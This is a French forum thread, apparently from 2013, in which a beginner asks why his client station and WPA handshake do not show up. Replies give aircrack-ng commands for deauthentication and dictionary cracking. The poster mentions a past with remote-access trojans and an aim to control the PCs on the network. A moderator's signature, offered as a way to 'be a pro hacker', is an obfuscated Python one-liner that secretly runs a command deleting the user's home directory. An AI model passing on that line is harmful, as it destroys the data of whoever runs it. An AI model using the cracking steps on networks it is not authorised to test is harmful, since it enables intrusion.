Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 18-04-2013 18:38:30

CLeBeR
Banni(e)
Inscription : 18-04-2013
Messages : 6

Ma station ne s'affiche pas

Bonjour à tous,

je viens de m'inscrire sur ce forum pour recevoir de l'aide car je voudrais tester la sécurité de ma Freebox V6 qui je pense est loin d'être infaillible. Je commence par essayer d'entrer sur ma freebox puis ensuite je verrai ce que je peux faire une fois sur mon réseau, si je peux exploiter les PCs connectés, les contrôler ...

Je veux donc entrer dans le vrai monde de la sécurité car j'ai longtemps été dans comme vous dites Le monde obscur du controle à distance, black hat inside (RAT).

mon PC où est installé BackTrack 5 R3 Gnome est un HP 6735B

Avant hier j'ai arrêté le processus à l'étape :

# aireplay-ng -0 0 -a <bssid> -c <station> <interface>

# aireplay-ng -0 0 -a <bssid> <interface>

l'info du handshake ne se modifiait pas et donc L'adresse du handshake ne matchait pas celle de l'AP. (Pour reprendre le vocabulaire de ce tutorial : http://vpourchet.com/2011/06/17/backtra … -par-wpa/)

Le soucis aujourd'hui c'est lorsque je peaufine notre scan via la commande :

# airodump-ng -write <fichier de sortie> -bssid <bssid> <interface>

Ma station ne s'affiche pas, je ne comprends vraiment pas pourquoi.

Merci de votre aide !

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 18-04-2013 19:13:24

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 006

Re : Ma station ne s'affiche pas

Peut être que ta station ne broadcaste pas son ESSID.
Ne vois-tu pas son BSSID ? (Pense à te fixer sur le bon canal avec l'option --channel)


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#3 18-04-2013 19:53:52

CLeBeR
Banni(e)
Inscription : 18-04-2013
Messages : 6

Re : Ma station ne s'affiche pas

Salut spawn,

Peut être que ta station ne broadcaste pas son ESSID.

Je comprends dans cette phrase qu'elle ne montre pas son ESSID ? Si parce que je l'ai eu avant hier.

Ne vois-tu pas son BSSID ?

Si je le vois, je l'ai bien entré d'ailleurs.

airodump-ng --channel <Numero_Canal> --write <fichier de sortie> --bssid <bssid> <interface>

Il n'y a pas un raccourcit clavier à régler pour désactiver un filtre où quoi ? Parce que comme j'ai appuyé un peu sur toutes les touches ...

Hors Ligne

#4 18-04-2013 20:23:30

le dirdir
Membre d'Or
Inscription : 09-03-2013
Messages : 367

Re : Ma station ne s'affiche pas

CLeBeR a écrit :

Le soucis aujourd'hui c'est lorsque je peaufine notre scan via la commande :

# airodump-ng -write <fichier de sortie> -bssid <bssid> <interface>

Ma station ne s'affiche pas, je ne comprends vraiment pas pourquoi.

Merci de votre aide !

Ta station est bien allumée, conectée à ton AP ?  Tu fais ton test avec 2 machines  ?

Tu pourrais nous donner le retour  de tes commande (en modifiant les MAC et les BSSID) ?


Tant vaut l'antenne, tant vaut le poste

Hors Ligne

#5 18-04-2013 22:26:17

freekiss
Membre Indéboulonnable
Lieu : Belgique
Inscription : 07-09-2011
Messages : 108

Re : Ma station ne s'affiche pas

as tu plusieurs carte reseaux?
sinon, un

airmon-ng start (interface)
airodump-ng (interface)
airodump-ng  --bssid 00:11:22:44:44 -c (channel==>important pour capter ta station) interface
airodump-ng --bssid 00:11:44:.... -h station interface
aireplay-ng -0 4 --bssid 00:11:55:77:.... -h 00:55:77:88.....interface( la tu as ton handshake)
puis aircrack-ng -w dicos puis /ton fichier .cap  (ou pyrit)
 

tiens nous au courant,

Dernière modification par freekiss (18-04-2013 22:28:47)


Si j'étais un crapaud, je serais un backtractien, smile

Hors Ligne

#6 19-04-2013 14:45:35

CLeBeR
Banni(e)
Inscription : 18-04-2013
Messages : 6

Re : Ma station ne s'affiche pas

Salut,
tout d'abord merci de votre aide !

Ta station est bien allumée, conectée à ton AP ?  Tu fais ton test avec 2 machines  ?

Tu pourrais nous donner le retour  de tes commande (en modifiant les MAC et les BSSID) ?

Comme je te l'ai dit, je débute avec BackTrack donc je ne sais pas comment faire, si tu peux m'expliquer.
Et je ne comprends pas ce qu'est le AP.

J'ai essayé les commandes de freekiss et je n'obtiens toujours pas la station. Mais ce qui est bizzare c'est que la première fois j'avais bien la station :'(

Hors Ligne

#7 19-04-2013 15:44:41

le dirdir
Membre d'Or
Inscription : 09-03-2013
Messages : 367

Re : Ma station ne s'affiche pas

@ CLeBeR : je n'ai rien contre toi et cet avis n'engage que moi : si tu ne sais pas donner le retour d'une commande ou les informations utiles, ça signifie que tu ne débute pas que sur Backtrack mais sur UNIX.

Je te conseille d'apprendre les bases avant de t'attaquer à Backtrack, avec Ubuntu ou Fedora (entre autres) par exemple.

Je te souhaite bon courage.


Tant vaut l'antenne, tant vaut le poste

Hors Ligne

#8 21-04-2013 22:09:35

CLeBeR
Banni(e)
Inscription : 18-04-2013
Messages : 6

Re : Ma station ne s'affiche pas

Salut,
après avoir résolu mon problème de la station qui ne s'affichait pas (du à je pense la carte qui était utilisée par une autre application j'ai donc killé ces applications), j'ai un nouveau problème c'est que mon WPA Handshake ne s'affiche pas.
Auriez vous une solution ? En m'expliquant si il faut faire des manipulations comme le renvoi de commande (que j'ai cherché à faire à l'aide de google mais je n'ai pas trouvé.)
Merci.

Hors Ligne

#9 22-04-2013 17:10:46

CLeBeR
Banni(e)
Inscription : 18-04-2013
Messages : 6

Re : Ma station ne s'affiche pas

Salut,
grâce à cette vidéo : https://www.youtube.com/watch?v=XUrn0DkoXZ8 je me suis rendu compte qu'il fallait un préiphérique en Wifi connecté à la BOX pour avoir une station, j'ai testé car aucune station n'apparaissait et effectivement, aussi tôt connecté en Wifi, la station est apparue.
ça veut dire que si je n'ai aucun périphérique connecté, je ne peux pas me connecter à ma box car je ne peux pas récupérer la station ?

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
5 1855 21-08-2016 19:48:53 par M!C
3 664 05-12-2015 20:20:28 par Seska
5 2556 29-12-2014 18:39:09 par kcdtv
Station backtrack par wassim
2 1281 10-09-2014 23:38:41 par kcdtv
12 1201 09-08-2014 19:00:12 par yamasaki

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.026 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]